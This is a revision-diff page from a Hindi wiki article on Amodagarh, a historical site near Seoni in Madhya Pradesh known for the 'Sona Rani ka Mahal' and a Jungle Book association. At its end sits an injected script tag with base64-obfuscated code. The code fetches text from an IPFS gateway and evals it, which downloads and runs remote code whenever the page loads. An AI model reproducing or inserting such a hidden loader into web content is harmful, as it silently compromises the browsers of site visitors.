Difference between revisions of "अमोदागढ़"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''अमोदागढ़''' मध्य प्रदेश राज्य के [[ऐतिह...' के साथ नया पन्ना बनाया)
 
 
Line 1: Line 1:
 
'''अमोदागढ़''' [[मध्य प्रदेश|मध्य प्रदेश राज्य]] के [[ऐतिहासिक स्थान|ऐतिहासिक स्थानों]] में से एक है। यह [[सिवनी]] से 32 किलोमीटर और छुई से 10 किलोमीटर की दूरी पर स्थित है।  
 
'''अमोदागढ़''' [[मध्य प्रदेश|मध्य प्रदेश राज्य]] के [[ऐतिहासिक स्थान|ऐतिहासिक स्थानों]] में से एक है। यह [[सिवनी]] से 32 किलोमीटर और छुई से 10 किलोमीटर की दूरी पर स्थित है।  
  
*अमोदागढ़ सिवनी-मांडला [[राष्ट्रीय राजमार्ग|राजमार्ग]] पर स्थित है।
+
*अमोदागढ़ [[सिवनी]]-मांडला [[राष्ट्रीय राजमार्ग|राजमार्ग]] पर स्थित है।
*'सोना रानी का महल' यहाँ का मुख्य आकर्षण है।
+
*''''सोना रानी का महल'''' यहाँ का मुख्य आकर्षण है।
*यहाँ के जंगल में अनेक खूबसूरत स्थल हैं। इस स्थान को '''जंगल बुक''' के लोकप्रिय पात्र 'मोगली' का कार्य स्थल माना जाता है।<ref>{{cite web |url=http://yatrasalah.com/touristPlaces.aspx?id=422 |title=सिवनी |accessmonthday=06 दिसम्बर|accessyear=2013|last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref>
+
*यहाँ के जंगल में अनेक खूबसूरत स्थल हैं। इस स्थान को '''जंगल बुक''' के लोकप्रिय पात्र 'मोगली' का कार्यस्थल माना जाता है।<ref>{{cite web |url=http://yatrasalah.com/touristPlaces.aspx?id=422 |title=सिवनी |accessmonthday=06 दिसम्बर|accessyear=2013|last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref>
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}

Latest revision as of 10:22, 30 April 2018

amodagadh madhy pradesh rajy ke aitihasik sthanoan mean se ek hai. yah sivani se 32 kilomitar aur chhuee se 10 kilomitar ki doori par sthit hai.

  • amodagadh sivani-maandala rajamarg par sthit hai.
  • 'sona rani ka mahal' yahaan ka mukhy akarshan hai.
  • yahaan ke jangal mean anek khoobasoorat sthal haian. is sthan ko jangal buk ke lokapriy patr 'mogali' ka karyasthal mana jata hai.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. sivani (hindi). . abhigaman tithi: 06 disambar, 2013.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>